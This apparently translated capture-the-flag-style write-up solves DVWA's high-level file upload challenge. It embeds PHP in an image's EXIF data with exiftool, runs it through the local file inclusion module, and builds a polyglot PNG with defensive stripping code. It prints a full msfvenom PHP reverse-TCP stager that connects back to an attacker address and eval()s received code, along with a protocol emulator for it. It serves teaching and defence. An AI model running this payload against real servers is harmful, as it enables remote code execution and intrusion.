# High

Below is the source code of the File Upload challenge at the high level in DVWA.

`vulnerabilities/upload/source/high.php`:

```php
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    // Three checks: extension whitelist, size limit, and getimagesize(), which
    // only parses the image header, so a real image with extra bytes in its
    // metadata still passes.
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>
```

## Gathering Information <a href="#mencari-informasi" id="mencari-informasi"></a>

This time the validation gains an extra call, [`getimagesize()`](https://www.geeksforgeeks.org/php-getimagesize-function/), which is meant to make sure that the file the user uploads really is an image. The catch is that `getimagesize()` only reads the image header to work out the type and dimensions; it says nothing about what else the file contains.

As far as I know at this point, a non-image file can no longer be uploaded directly: the extension whitelist (`jpg`, `jpeg`, `png`), the size limit (under 100000 bytes) and `getimagesize()` all have to pass.

After days of searching I found the answer: embed the PHP script in the EXIF data of a real image. The file stays a valid JPEG with an allowed extension and a small size, so it passes all three checks. Upload it to the target server, then run the script through the local file inclusion vulnerability: because the extension is `.jpg`, the web server never hands the file to PHP on a direct request, but `include()` parses whatever file it is given and executes any `<?php ... ?>` block it finds, metadata included.
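To see concretely why the three checks pass, here is an added example (my own Python, not DVWA's code) that builds such a polyglot from scratch, runs a port of the checks in `high.php` over it, and then applies the fix a defender would want. It generalises the page's JPEG/EXIF trick: it uses a PNG with the payload in a `tEXt` chunk, because a valid PNG is easy to assemble by hand, and its `image_size()` is a PNG-only stand-in for `getimagesize()`; the payload string, the 2x2 red image and the `Comment` keyword are constructed for the demo.

```python
# Added example (not DVWA's code): an image that passes every check in high.php
# while carrying PHP in its metadata, plus the hardening that removes it.
# A PNG tEXt chunk stands in for the JPEG EXIF tag exiftool writes on the page;
# getimagesize() treats both the same way: it looks at the header only.
import struct
import zlib

PHP_PAYLOAD = b"<?php phpinfo(); die(); ?>"      # same probe as on the page
PNG_SIG = b"\x89PNG\r\n\x1a\n"
CRITICAL = (b"IHDR", b"PLTE", b"IDAT", b"IEND")  # everything else is ancillary metadata


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk: length, type, body, CRC over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack("!I", len(body)) + ctype + body + struct.pack("!I", crc)


def build_polyglot_png(payload: bytes, width: int = 2, height: int = 2) -> bytes:
    """A genuine 8-bit RGB PNG whose tEXt chunk carries the PHP payload (constructed)."""
    ihdr = struct.pack("!IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # one filter byte (0 = None) per scanline, then solid red pixels
    scanlines = b"".join(b"\x00" + b"\xff\x00\x00" * width for _ in range(height))
    return (PNG_SIG
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"tEXt", b"Comment\x00" + payload)  # keyword, NUL, text
            + _chunk(b"IDAT", zlib.compress(scanlines))
            + _chunk(b"IEND", b""))


def image_size(data: bytes):
    """Stand-in for PHP's getimagesize(), PNG only: like the real function it
    reads width/height from the header and never inspects the rest of the file."""
    if len(data) < 24 or data[:8] != PNG_SIG or data[12:16] != b"IHDR":
        return None
    return struct.unpack("!II", data[16:24])


def high_php_accepts(filename: str, data: bytes) -> bool:
    """Port of the three checks in high.php (extension, size, getimagesize())."""
    ext = filename[filename.rfind(".") + 1:].lower()
    return (ext in ("jpg", "jpeg", "png")
            and len(data) < 100000
            and image_size(data) is not None)


def contains_php(data: bytes) -> bool:
    """What a scanner over the upload directory should look for."""
    return b"<?php" in data or b"<?=" in data


def strip_ancillary_chunks(data: bytes) -> bytes:
    """Hardening: keep only the critical chunks, dropping tEXt/zTXt/iTXt/eXIf
    and friends. The PHP equivalent is re-encoding with GD
    (imagecreatefrompng() followed by imagepng()), which also rewrites pixels."""
    out, pos = [PNG_SIG], 8
    while pos + 8 <= len(data):
        (length,) = struct.unpack("!I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        if ctype in CRITICAL:
            out.append(_chunk(ctype, body))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return b"".join(out)


if __name__ == "__main__":
    evil = build_polyglot_png(PHP_PAYLOAD)
    print("passes high.php checks:", high_php_accepts("kucing.png", evil))  # True
    print("payload present       :", contains_php(evil))                    # True
    clean = strip_ancillary_chunks(evil)
    print("after stripping       :", contains_php(clean), image_size(clean))  # False (2, 2)
```

Run it and the extension whitelist, the size limit and the header check all accept the file while the payload is still inside it. Stripping ancillary chunks (or re-encoding with GD on the PHP side) removes this particular payload, but the attack only needs the bytes to survive until `include()` reads them, and carefully crafted pixel data can survive re-encoding too, so the real fix is that uploaded files must never be reachable by an `include()`: close the LFI, and keep uploads outside the web root or behind a handler that serves them as static data.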

## Performing the Attack <a href="#melakukan-serangan" id="melakukan-serangan"></a>

**First**, take any image and embed the script with [EXIFTOOL](https://exiftool.org/) like so:

```bash
exiftool -DocumentName="<?php phpinfo(); die(); ?>" kucing.jpg
```

The script now sits in the image's `Document Name` EXIF tag:

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M00ui-BVGD011QicTVN%2Fimage.png?alt=media\&token=37754eb9-ae85-4fd3-9c35-0359ed41830e)

Running the file through the PHP CLI shows the following (PHP prints every byte before the `<?php` tag as literal output, then executes the script):

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M00utc2SI2wMVU3v4Q1%2Fimage.png?alt=media\&token=22b0b54c-1747-4334-b0a0-f85ead4c8ec1)

Great! Next, upload the file and reach it through the local file inclusion vulnerability (on DVWA that is the File Inclusion module, for example `vulnerabilities/fi/?page=../../hackable/uploads/kucing.jpg` with that module set to low). The result looks like this:

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M00vZd41rlDUP2rXrHr%2Fimage.png?alt=media\&token=91aab757-52ad-4271-ac0c-76e316277b6d)

The [`phpinfo()`](https://www.php.net/manual/en/function.phpinfo.php) function ran. Next we try a reverse shell, as in the previous level.

### Performing a Backconnect <a href="#melakukan-backconnect" id="melakukan-backconnect"></a>

First, generate the shell with msfvenom as in the previous level.

Then embed that shell in the image's EXIF data. The one-liner below is the `php/meterpreter/reverse_tcp` stager msfvenom produces, with LHOST `172.17.0.1` and LPORT `1337`; it connects back, reads a 4-byte length and then that many bytes of PHP, and hands them to `eval()`:

```bash
exiftool -DocumentName='<?php /**/ error_reporting(0); $ip = "172.17.0.1"; $port = 1337; if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") && ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } else { eval($b); } die(); __halt_compiler();' kucing.jpg
```

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M01-mOiJ9Il0DhuW-Nx%2Fimage.png?alt=media\&token=7a5252b7-5f7a-411f-8bc8-364ed3668a1d)

Make sure our machine (the attacker) is already listening for the backconnect; for this payload that is Metasploit's `exploit/multi/handler` with the same payload, LHOST and LPORT. Then upload the image and access it through the local file inclusion vulnerability.

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M010J72b_SdPjT8wUJK%2Fimage.png?alt=media\&token=472290a5-2897-42cd-aaa4-766a59a77938)

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-M00uNDVzgFg4JN4MUlq%2F-M010j22RacJaF4gX-nM%2Fimage.png?alt=media\&token=35a4e480-a481-43f5-b94f-0e481048cc78)

If it works, it looks like the screenshots above. Congratulations! 😁
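Why the handler has to be Metasploit's and not just `nc -lvp 1337`: the stager above does not run a shell by itself, it expects the listener to push the real payload over the socket in a specific framing. The added example below (my own Python, not msfvenom's or Metasploit's code) plays both sides of that exchange on localhost so the protocol is visible: `frame_stage()` is what the handler sends, `read_stage()` is a port of the stager's receive loop. The stage bytes are a harmless stand-in string, not the PHP Meterpreter, and the loopback port is chosen by the OS; both are assumptions for the demo.

```python
# Added example (not Metasploit code): the wire protocol of the php reverse_tcp
# stager shown on the page, emulated end to end on localhost.
import io
import socket
import struct
import threading

# Constructed stand-in for what exploit/multi/handler pushes. A real stage is
# PHP source with no opening <?php tag, because the stager feeds it to eval().
SAMPLE_STAGE = b'echo "stage running"; system("id");'


def frame_stage(stage: bytes) -> bytes:
    """Handler side: 4-byte big-endian unsigned length, matching the stager's
    unpack("Nlen", ...), followed by the stage body."""
    return struct.pack("!I", len(stage)) + stage


def _read_exact(recv, n: int) -> bytes:
    """The stager's `while (strlen($b) < $len)` loop: keep reading until n bytes.
    `recv` is any callable taking a byte count (socket.recv, BytesIO.read)."""
    buf = b""
    while len(buf) < n:
        chunk = recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the frame completed")
        buf += chunk
    return buf


def read_stage(recv) -> bytes:
    """Stager side: read the length header, then exactly that many bytes.
    (The PHP stager reads the header with a single fread() and exits on a
    zero length; here the header read is looped for robustness.)"""
    (length,) = struct.unpack("!I", _read_exact(recv, 4))
    return _read_exact(recv, length)


def start_handler(stage: bytes, host: str = "127.0.0.1") -> int:
    """Minimal stand-in for exploit/multi/handler: accept one connection,
    send the framed stage, close. Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))            # port 0: let the OS choose a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve_once():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(frame_stage(stage))
        srv.close()

    threading.Thread(target=serve_once, daemon=True).start()
    return port


def stager_roundtrip(stage: bytes, host: str = "127.0.0.1") -> bytes:
    """Play both roles: start a handler, connect the way the stager's
    stream_socket_client("tcp://ip:port") does, return what eval() would get."""
    port = start_handler(stage, host)
    with socket.create_connection((host, port), timeout=5) as s:
        return read_stage(s.recv)


if __name__ == "__main__":
    print(stager_roundtrip(SAMPLE_STAGE).decode())  # echo "stage running"; system("id");
    # The same parser works on a captured frame without any network:
    print(read_stage(io.BytesIO(frame_stage(b"phpinfo();")).read))  # b'phpinfo();'
```

In practice the listener is `msfconsole` with `use exploit/multi/handler`, `set payload php/meterpreter/reverse_tcp`, and LHOST/LPORT equal to the values baked into the stager (`172.17.0.1` and `1337` above). A plain netcat listener would get the connection but never send the length header, so the stager sits blocked in `fread()` and the shell never appears.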

Phew! I picked up a lot of interesting experience here. Keep it up!

Happy Hacking! 🍻

